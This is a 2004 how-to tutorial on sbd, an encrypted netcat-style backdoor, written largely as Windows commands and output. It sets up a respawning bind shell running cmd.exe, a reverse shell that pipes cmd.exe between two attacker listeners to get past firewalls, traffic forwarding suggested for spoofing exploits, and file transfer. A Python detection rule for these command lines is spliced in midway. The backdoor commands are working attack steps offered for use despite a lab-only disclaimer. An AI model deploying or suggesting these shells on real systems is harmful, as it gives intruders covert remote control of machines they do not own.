A small tutorial on sbd, Shadowinteger's Backdoor.
Version 1.0 by xxradar
mailto:xxradar@radarhack.com
http://www.radarhack.com
1. Introduction.
An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://www.cycom.se/dl/sbd. It is described as a ‘Netcat-clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.
Let’s check out some possibilities, using simple examples.
Please note that all testing is done in a private test environment. The results are described in this paper using 127.0.0.1 addresses. This paper is solely for educational use and the techniques are only to be reproduced in a test environment. Do not use this information to cause harm to other computers and/or people.
2. Connecting to a remote server
The simplest example shows how to establish a TCP connection to a remote server and issue some protocol commands. Specifying the ‘-c off’ switch disables the default built-in encryption of the sbd client.
D:\sbd-1.27\binaries>sbd -c off www.radarhack.com 80
GET / HTTP/1.1
Date: Thu, 17 Jun 2004 18:38:03 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
127
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
….
3. Chatting
The next example shows how to use sbd as a ‘chat client’ and ‘server’. All communications are by default encrypted with AES and preceded by a PREFIX (‘-P prefix’). By specifying the ‘-l’ switch, sbd is put in listening mode on TCP port 100 (‘-p 100’).
On the server side:
D:\sbd-1.27\binaries>sbd -P xxradar -l -p 100
demolisher: I the connector ....
I'm de receiver ....
On the client side:
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
I the connector ....
xxradar: I'm de receiver ....
From the moment the client disconnects, the server side will exit. In order to ‘respawn’ the server, specify the ‘-r seconds’ switch. The server will be listening again after the specified amount of time. This keeps the backdoor from exiting for good and allows the client to reconnect. Specifying a time of 0 seconds will respawn the server immediately.
D:\sbd-1.27\binaries>sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
test1
^C
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
… after 8 seconds ….
D:\sbd-1.27\binaries>sbd -P demolisher 127.0.0.1 100
test2
^C
D:\sbd-1.27\binaries>
5. Getting a command shell
Let’s get into something more ‘interesting’. Want to set up an encrypted connection on whatever TCP port you like, providing you with a command shell? Here it is!
On the server side:
D:\sbd-1.27\binaries>sbd -r 0 -l -p 100 -e cmd.exe
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\sbd-1.27\binaries>date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
Using the monitor switch ‘-m on’ on the server side displays an echo of the communication on the server side.
On the server side:
D:\sbd-1.27\binaries>sbd -m on -r 0 -l -p 100 -e cmd.exe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:\date
date
The current date is: Thu 06/17/2004
Enter the new date: (mm-dd-yy)
6. Creating a reverse shell
The previous example is quite simple, but you need to be able to connect to an open port on the server on which the backdoor is running. This will often be impossible, due to firewall configurations. Chances are much better if we can make the shell connect to the outside (assuming the server can connect out for some services like SMTP, http, dns, ….) where our sbd client is listening.
First of all, create two listening sockets on the attacking client. The first one will be used to send commands to the backdoor.
D:\sbd-1.27\binaries>sbd -l -p 2000
dir
A second cmd window will function as the output channel.
D:\sbd-1.27\binaries>sbd -l -p 3000
 Volume in drive D is BACKUP
 Volume Serial Number is 584C-2AAD

 Directory of D:\

06/17/2004  09:58 PM    <DIR>          .
06/17/2004  09:58 PM    <DIR>          ..
06/17/2004  09:27 PM                15 backup.txt
08/23/2001  02:00 PM           114,688 calc.exe
06/17/2004  10:00 PM                20 command.txt
06/17/2004  10:01 PM                 0 dump.txt
06/17/2004  09:25 PM                15 in.log
D:\>
Then run the following command on the server
D:\sbd-1.27\binaries>sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command connects to port 2000 and receives commands from the client, which are piped into cmd.exe. The output is sent back to the attacker across the second connection.
7. TCP connection forwarding
In the next example, a listening socket is set up that forwards the client’s input to another server. This might be a handy trick to forward and spoof an exploit☺. Note that the return data is only displayed at the server side of sbd. (You can create an additional pipe to return the info to the client.)
On the server side:
D:\sbd-1.27\binaries>sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
listening on port 90
connect to 127.0.0.1:90 from 127.0.0.1:1700 (localhost)
HTTP/1.1 302 Found
Date: Sun, 20 Jun 2004 14:07:42 GMT
Server: Apache/1.3.27 (Unix) mod_jk/1.2.0 Chili!Soft-ASP/3.6.2 mod_perl/1.26 mod
_throttle/3.1.2 PHP/4.3.1 FrontPage/4.0.4.3 mod_ssl/2.8.11 OpenSSL/0.9.6h
Location: http://www.radarhack.com/error_docs/not_found.html
Connection: close
Content-Type: text/html; charset=iso-8859-1
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 90
HEAD / HTTP/1.0
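As an added example (not part of the original tutorial), the Python below picks the sbd patterns from sections 5 to 7 out of process command lines, the way a defender would in an endpoint-log rule: a listener that executes cmd.exe (‘-e’), the respawn switch (‘-r’), disabled encryption (‘-c off’), the sbd | cmd.exe | sbd reverse-shell pipeline and the listener-to-outbound forwarding pipeline. The sample command lines are constructed from the tutorial’s own invocations, and www.example.invalid is a placeholder host.

```python
# Constructed sample process command lines modelled on the sbd invocations in this
# tutorial (not real logs); www.example.invalid stands in for the remote host.
SAMPLE_EVENTS = [
    "sbd -c off www.example.invalid 80",
    "sbd -P xxradar -l -p 100",
    "sbd -r 0 -l -p 100 -e cmd.exe",
    "sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000",
    "sbd -vv -l -p 90 | sbd -c off www.example.invalid 80",
    "sbd -l -p 100 < NUL > in.log",
]
WITH_ARG = ("-e", "-r", "-p", "-c", "-P", "-m", "<", ">")   # switches that take a value

def parse_sbd(stage):
    """Pick the switches the tutorial uses out of one sbd pipeline stage."""
    toks = stage.split()
    info = {"listen": "-l" in toks, "exec": None, "respawn": None,
            "encrypted": True, "port": None}
    i = 1                                    # toks[0] is the sbd binary itself
    while i < len(toks):
        t, nxt = toks[i], (toks[i + 1] if i + 1 < len(toks) else None)
        if t == "-e":
            info["exec"] = nxt               # program bound to the socket (-e cmd.exe)
        elif t == "-r":
            info["respawn"] = nxt            # seconds before listening again
        elif t == "-p":
            info["port"] = nxt
        elif t == "-c":
            info["encrypted"] = nxt != "off"
        i += 2 if t in WITH_ARG else 1       # flags like -l and -vv take no value
    return info

def classify(cmdline):
    """Return the findings for one (possibly piped) command line."""
    stages = [s.strip() for s in cmdline.split("|")]
    sbd_idx = [i for i, s in enumerate(stages) if s.split()[:1] == ["sbd"]]
    findings = []
    for i in sbd_idx:
        info = parse_sbd(stages[i])
        if info["exec"]:
            findings.append("bind shell: listener on port %s executes %s" % (info["port"], info["exec"]))
        if info["respawn"] is not None:
            findings.append("respawning listener (-r %s)" % info["respawn"])
        if not info["encrypted"]:
            findings.append("encryption disabled (-c off)")
    if len(sbd_idx) == 2:                    # two sbd stages in one pipeline
        middle = stages[sbd_idx[0] + 1:sbd_idx[1]]
        if any("cmd" in s.lower() for s in middle):     # sbd | cmd.exe | sbd (section 6)
            findings.append("reverse shell: commands piped through cmd.exe to output channel")
        elif parse_sbd(stages[sbd_idx[0]])["listen"]:   # sbd -l | sbd host port (section 7)
            findings.append("TCP forwarding: listener piped into outbound sbd")
    return findings
```

Run `classify` over each entry of `SAMPLE_EVENTS` to see which of the tutorial’s invocations a rule like this would surface; the plain chat listener and the file-logging listener produce no findings.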
8. Logging to a file or transferring files
Logging to a file is as simple as illustrated in the next examples. (You must specify the < NUL >!)
On the server side:
D:\sbd-1.27\binaries>sbd -l -p 100 < NUL > in.log
D:\sbd-1.27\binaries>type in.log
This is a test!
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100
this is a test
^C
D:\sbd-1.27\binaries>
Copying files is illustrated in the next example (this also works with executable files).
On the server side:
D:\sbd-1.27\binaries>sbd -l -p 100 < NUL > backup.txt
D:\sbd-1.27\binaries>type backup.txt
this is a test
D:\sbd-1.27\binaries>
On the client side:
D:\sbd-1.27\binaries>sbd 127.0.0.1 100 < in.log